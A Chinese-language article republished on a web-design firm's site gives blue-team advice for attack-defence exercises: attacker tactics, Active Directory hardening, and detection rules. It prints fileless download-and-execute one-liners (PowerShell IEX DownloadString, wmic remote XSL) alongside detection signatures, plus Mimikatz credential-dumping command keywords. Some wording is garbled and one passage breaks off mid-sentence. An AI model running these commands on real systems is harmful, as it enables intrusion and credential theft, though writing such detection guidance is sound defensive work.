悉知科技
首页
    电商团队建设
    • 电商团队组建优化
    • 电商团队招聘
    • SEO站(群)管理系统
    • 电商询盘管理系统
    • 客户案例
    • 知识百科
    品牌营销策划
    • 视频营销
    • 事件营销
    • 公关传播
    • 社会化新媒体营销
    • 客户案例
    • 品牌营销资讯
    网站建设开发
    • 建站服务
    • 建站优势
    • 建站套餐
    • 客户案例
    • 建站资讯
    内贸营销推广
    • PPC竞价服务
    • SEO推广服务
    • 社交化营销推广
    • 客户案例
    • 内贸推广知识
    外贸营销推广
    • 外贸服务
    • 谷歌开户托管
    • 外贸网站建设
    • 客户案例
    • 外贸知识技巧
    商业评估服务
    • 商业数据服务
    • 客户案例
    • 商业数据知识百科
    关于悉知科技
    当前位置:首页 > 网站建设开发 > 建站资讯 >

    复查渗透测试网站项目案例分析

    推荐信息更多 >
    选词技巧:企业做SEM竞价关键词该如
    关于网站备案:企业网站建站必须知道
    百度竞价推广怎么做?新网站竞价推广
    企业网站外链建设:友情链接合作对象
    网站被黑后如何快速恢复?处理被黑检
    营销型网站5要素:营销型网站建设注
    热度排行榜更多 >
    1开展企业新闻营销活动注意事项
    2看过“成人网站”要当心!一旦手机出
    3微信公众号该要怎么包装?从运营方法
    42019年如何给贫困山区捐衣服地址,20
    5捐赠衣物正规官方网站,中国上海红
    6新闻稿投放技巧:把握好时间点传播效

    复查渗透测试网站项目案例分析

    2020-08-31  |   浏览量:  |   标签:攻击者,终端,系统

      最近我们Sinesafe参加的几家机构的渗透测试防守方防护方案评估复查,部分防守方缺乏对攻击者的正确认知,攻击者的手法已经比较高超了,不扫描,不落地,污染日志等都很普及了。同时也要正确认知对手:攻防演练中,攻击者并非无所不能,他们面临着和防御方一样的问题:时间紧,任务重。所以攻击者的攻击目标,攻击手法也是有迹可循的,知己知彼才能百战百胜。

      渗透测试

      一、知彼

      攻击者也是讲成本的,因此防守方最好的策略是:做的比其他防守方好一点点即可。好一点的含义:不在低级问题上犯错(弱密码、互联网应用远程RCE、管理后台暴露、重要we服务器未打补丁等)。对于“时间紧、任务重”的防守方来说,修建固若金汤的防线显然意味着大成本投入,以及最紧缺的时间,因此本文不会面面俱到,只选择性价比高值得快速投入的安全措施和大家分享。

      攻击者一般:目标明确、步骤清晰、控制成本、反检测,反清理、三流分立。

      目标明确:攻击者只攻击得分项,和必要路径(外网入口,内网立足点),对这些目标采取高等级手段,会隐蔽操作;对非必要路径顺路控制下来的we服务器,并不怕被发现,用起来比较随意,甚至主动制造噪音,干扰防守方。

      步骤清晰:信息收集-控制入口-横向移动-维持权限-攻击目标系统。每一步都是经典操作和教科书式手法。

      控制成本:

    优先攻击高权限账号,如管理员,目标系统负责人账号; 优先攻击运维/安全人员账号和终端,这些人往往有we服务器root账号,安全设备管理员账号,可以进一步深入控制; 优先攻击集中管控设施,如域控,集中身份认证系统,终端管理系统,攻陷单系统即获得公司企业内大部分系统的权限; 优先攻击基础设施,如DNS,DHCP,邮件系统,知识分享第三方平台,oa系统,工单系统;这些系统有内置高权限账号,或可以帮助攻击者隐蔽痕迹。或Git/SVN等建设开发源代码管理we服务器,通过代码审计发现应用0day漏洞。

      反检测,反清理:

    样本隐蔽技术(白利用(带微软签名的程序执行未签名的黑dll),样本不落地执行(从网上加载样本,只运行在内存,不落盘不惊动杀软)); 快速扩散(攻击者会将攻击包做成自动化工具,降低人力投入,快速控制一批有漏洞发we服务器); 停止日志外发,日志清除(脚本优先停止常见日志外发工具;同时有开源自动化工具来劫持日志产生的进程,使得系统不产生日志;使用完后删除access.log等日志); 减少扫描,通过分析日志、分析配置文件、管理员来源IP等方式来获得内网的其他机器IP信息,而不是扫描。 访问点击增加添加image图片描述(最多60个字)

      三流分立:

    扫描流:用来大批量扫描内网存活IP和漏洞,扫描源通常不被攻击者重视,被清除也不会影响到攻击计划,高水平攻击者通常使用扫描行为来分散防守方精力。 数值数据流:用来向外网大量传输非关键数值数据,通常是有互联网权限的终端或we服务器(终端较多),很少有隧道行为或扫描行为,通过简单的/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-f--securing-domain-admins-groups-in-active-directory配置域管理员权限。 对抗攻击者使用MS14-068,MS17-010攻击域:从旧到新依次安装DC上的windows补丁。 对抗攻击者使用ExchangeSSRF漏洞:从旧到新依次安装Exchange上的windows补丁。 对抗LDAP relay攻击:在域控上配置LDAP enforce signing。 对抗LDAP relay和SSRF攻击:在域控上配置LDAPS channel binding。 对抗LLMNR/NBT Poisoning攻击:关闭域内WPAD服务。

       3.检测阶段

      渗透测试检测阶段

      原则:若域不安全,最佳修复方案是重装。

    检测敏感共享目录浏览访问:浏览访问了ADwe服务器的非正常共享目录 (非SYSVOL文件夹) 检测mimikatz一系列攻击行为: Mimikatz通过sysmon进程来进行检测,常见关键词有“gentilkiwi (Benjamin DELPY)”(公司企业名称)、 其他关键词:kerberos::golden sekurlsa::pth kerberos::ptt lsadump::dcshadow lsadump::dcsync sekurlsa::logonpasswords privilege::debug misc::skeleton 检测Kerberos弱加密方式:非AES加密方式的Kerberos票据加密请求相当可疑 检测异常注册表变更和dump:DSRMAdminLogonBehavior 变更AdminSDHolder 导出HKLM\SAM信息内容 导出HKLM\SYSTEM信息内容 导出HKLM\SECURITY信息内容 检测ntdsutil滥用:使用了ntdsutil的敏感参数activate instance ntds ;使用了ntdsutil的敏感参数set dsrm password 检测SID history变更:账号加入SID History成功、失败 检测lazagne密码提取工具:特征 lazagne 攻击者喜欢用的其他工具: procdump、PsExec、cain、Mshta、cmstp、QuarkPwDump、getpass、gethash、ntdsdump、Get-PassHashes、Wce、psaattack。

      3.3 主机防护(终端和we服务器)对抗

      攻击者在尝试控制终端和we服务器时,为了绕过常规的杀毒软件,通常会使用一些免杀手段。而某些免杀手段(如白利用,样本不落地执行)由于非常稳定和高效,更是受到广大攻击者的青睐。

      1.Powershell IEX组建下载执行.(文件在内存执行,不落硬盘)

      利用代码示例:powershell.exe -nop -whidden -c IEX ((new-objectnet.webclient).downloadstring('aa'))">

      监测特征:"IEX” AND “(New-Object Net.WebClient).DownloadString“

      2.Windows系统白文件利用(wmic.exe

      利用代码示例:cmd/c wmic os get /format:”\\x.x.x.x\1.xsl”&start/wait notepad

      监测特征:"wmic os get" AND "/format"3.Windows系统白文件利用(csc.exe)

      利用代码示例:

      "C:/Windows/Microsoft.NET/Framework64/v2.0.50727/csc.exe"/noconfig /fullpaths@"C:/Users/a/AppData/Local/Temp/l1xso2zu.cmdline"

      监测特征:"csc.exe" AND ("/r:System.EnterpriseServices.dll"OR "/unsafe")4.Windows系统白文件利用(msiexec.exe)

      特征:被动执行后台执行的参数,有一定误报率。请自行研究,不再举例。

      5.检测certutil白利用

      特征:常见绕防火墙使用的参数。请自行研究,不再举例。

      6.检测通过url.dll来进行不落地执行

      请自行研究,不再举例。

      3.4 账户和权限对抗

    高权限一律清理,限制使用范围,每次使用后确认。 应用权限通过日志分析检测滥用。 关注备份账户、可调整修改权限账户的使用。 终端24小时重启一次。(对抗终端权限抓取类攻击)

      3.5 瞬间死亡

      瞬间死亡有两种方式:路径打穿、系统打穿。

      3.5.1 路径打穿

      直接从未想过(未设防)的路径攻击过来。邮件是控制终端第一选择入口,具体防护可参见《公司企业安全建设指南:金融业内行业安全架构与技术时间》第16章:邮件安全。

      边缘网包括包含无线和自助终端,包括包含:打卡机、自动售卖机、会议室设备、ATM机、排队机等。限制无线和自助终端互联网网络和内网浏览访问。

      限制分支机构、外联公司企业等互联网网络和总部的互联网网络浏览访问。

      不要相信理论上不能全通,但实际上存在全通内网的系统。(死于方便性)

      3.5.2 系统打穿

      系统打穿,都是血泪史。因为我们总是忘记了这些最大的风险源。优先攻击中心化的系统和跨两网的系统,包括包含终端安全管控控制台(控制台安全防护能力很弱)、运维管理系统/Zabbix/Nagios/堡垒机等、单点登录SSO系统、AD活动目录;

    优先攻击基础设施:DNS、DHCP、邮件系统、研发we服务器SVN/Git; 高价值终端: 互联网网络管理员:终端内有互联网网络拓扑和ACL控制策略,甚至可以调整修改浏览访问控制; 安全管理员:有安全防护方案和检测系统、告警系统登录权限,很多安全系统做了登录来源限制,绕过手段之一就是控制安全管理员的终端,同时抓取安全管理员账户密码,攻击者一举两得; 研发个人终端/运维个人终端:高价值数值数据; 内网扫描器:互联网网络权限较大,哪都能去。 代码we服务器:代码数值数据价值比较高。私有协议建设开发的应用程序,源码要保护好,有经验攻击团队带代码审计技能成员,通过源码审计发现应用0day

      3.6 容易出问题的点

    互联网应用框架RCE 应用和中间件管理后台暴露 VPN:未启用双因素,或存在未启用双因素的部分用户使用者 测试环境的测试系统未及时打补丁、弱密码 通过邮件入口控制办公终端 跨两网的设备 we服务器密码同质问题 社工

      四、事中和事后

      前面分享了很多防护和检测的事项,但防守方到了这个阶段,更重要的是考虑一下事中的各种过载信息的研判和快速应急处置措施。

      我们打内部攻防演习的时候,最大的困扰是决策和处置。

      4.1 过载信息研判

      有效高速的决策机制,什么权限范围内的由什么人决策,这是授权。

      什么岗位(人)负责什么,这是职责划分。例如谁负责跟踪每条告警信息到Closed状态?谁负责断网?谁负责样本分析?谁负责失陷主机排查?谁负责溯源路径?谁负责记录?谁负责汇报?等等。

      4.2 快速应急处置

      4.2.1 硬件和后勤

    大的作战室,容纳全部防守队伍; 好的白板(最好电子的),便于梳理攻击路径; 准备好零食和一日三餐、行军床。

      4.2.2 重要信息同步

    已经沦陷的IP清单(黑名单),同步给所有防守方; 是不是是否C2网站域名快速判断,注意真假难辨的网站域名。

      4.2.3 各类应急处置措施

    断网:快速断网的操作规范和自动化工具 诱饵 临时增加添加ACL和FW规则 下线业务:和业务方确立建立畅通的沟通机制和快速的决策机制

      如果失陷(疑似)主机,决策用于诱饵,务必确保诱饵的风险可控,万一持续利用诱饵在内网横向移动,再进行限制就困难了。

      注意体力分配,高水平攻击者通常使用扫描行为等方式来分散防守方精力。

      4.3 渗透测试复检

      攻防实战演习后的总结改进提高提升,才是最终目的。

      4.3.1 防护薄弱点和改进措施

    安全团队 协作团队 厂商和第三方

      安全团队不好推动的工作,不好讲的话,要不到的资源,都可以在这里提出来。

      应急处置薄弱点和改进措施,落实到人、计划和资源中,才是务实的。

      4.3.3 资源不足,要资源

      安全规划管理运营是必由之路,参见 金融业公司企业安全建设之路

      7*24小时的安全规划管理运营,既然攻击对手是7*24小时的,为什么安全规划管理运营不是呢?

      4.3.4 必要的管理层汇报

      五、注意事项

      不要影响业务。攻防演习前的加固,需要妥善评估对业务可用性影响,攻防演习中的应急处置,需要妥善评估对业务可用性影响,毕竟,业务可用性才是老大,安全不是,摆正心态和位置,如果对渗透测试有想法的朋友可以找专业的网站站点安全公司企业来处理解决,国内推荐Sinesafe,绿盟,启明星辰,等等的网站站点安全公司企业。

    转载自:复查渗透测试网站项目案例分析

    网站建设服务

    悉知科技是一个有着12年经验的网站建设开发公司,品牌建站/外贸网站建设/谷歌营销推广/品牌营销策划,这些我们都能帮您搞定!

    在线咨询

    网站建设制作方案是什么 ? 报价多少钱 ?

    获取建站报价
    上一条:苹果CMS v8 v10漏洞EXP挂马解决办法 下一条:网站漏洞检测 关于phpstudy后门的分析与修复
    【龙海网站建设】龙海网站建设制作公司_龙海在线建网站

    【龙海网站建设】龙海网站建设制作


    【龙海网站制作网站建设】龙海网站制作网站建设设计制作公司企业_龙海在线网站建设网站制作龙海网站制作网站建设悉知科学技术网站建设推荐1.网站制作网站建设基础服务,不懂的网站制作网站建设知识各项协助支持2.站点
    【漯河网站建设】漯河网站建设制作公司_漯河免费建站建网站

    【漯河网站建设】漯河网站建设制作


    【漯河网站制作网站建设】漯河网站制作网站建设设计制作公司企业_漯河无偿网站建设网站建设网站制作漯河网站制作网站建设悉知科学技术网站建设推荐1.网站制作网站建设基础服务,不懂的网站制作网站建设知识各项协助支
    【明港网站建设】明港网站建设制作公司_明港在线做建站

    【明港网站建设】明港网站建设制作


    【明港网站制作网站建设】明港网站制作网站建设设计制作公司企业_明港在线做网站建设明港网站制作网站建设悉知科学技术网站建设推荐1.网站制作网站建设基础服务,不懂的网站制作网站建设知识各项协助支持2.站点网站的
    【南平网站建设】南平网站建设制作平台_南平在线做网站

    【南平网站建设】南平网站建设制作


    【南平网站制作网站建设】南平网站制作网站建设设计制作第三方平台_南平在线做网站站点南平网站制作网站建设悉知科学技术网站建设推荐1.网站制作网站建设基础服务,不懂的网站制作网站建设知识各项协助支持2.站点网站
    【南阳网站建设】南阳网站建设制作平台_南阳在线建网站

    【南阳网站建设】南阳网站建设制作


    【南阳网站制作网站建设】南阳网站制作网站建设设计制作第三方平台_南阳在线网站建设网站制作南阳网站制作网站建设悉知科学技术网站建设推荐1.网站制作网站建设基础服务,不懂的网站制作网站建设知识各项协助支持2.站
    我们已经为 1000+ 客户提供了 网站建设开发 等相关服务 咨询获取报价
    多一份方案参考,总有益处
    获取方案及报价

    获取报价

    在线沟通

    添加微信好友

    18595836063

    成就客户,是我们的荣耀

    联系我们

    关于我们

    悉知科技(世界工厂网)团队成立于2008年,隶属于世邦工业科技集团。经过10年快速、稳健的发展,世界工厂网凭借雄厚的技术实力、专业的产品服务以及强大的资源背景,成功服务了数百万中国制造业企业,是中国电子商务综合服务提供商和线上生态建设服务的先行者。

    提供服务内容

    - 网站建设服务

    - 电商团队服务

    - 内贸营销推广

    - 外贸营销推广

    - 品牌营销建设

    - 商业数据服务

    联系我们

    18595835659

    lili01@gongchang.com

    河南省郑州市高新区科学大道169号

    3388293726

    您也可以咨询我们的在线客服或预约资深顾问

    提交免费电话
    信息保护中请放心填写

    立即获取报价

    信息保护中请放心填写
    获取报价

    免费电话

    在线咨询

    获取报价

    豫网文(2018)2118-024号 | Copyright 2008-2019 xizhi.com All Rights Reserved| 郑公备:41011002000005 | 豫公网安备 41010202002051号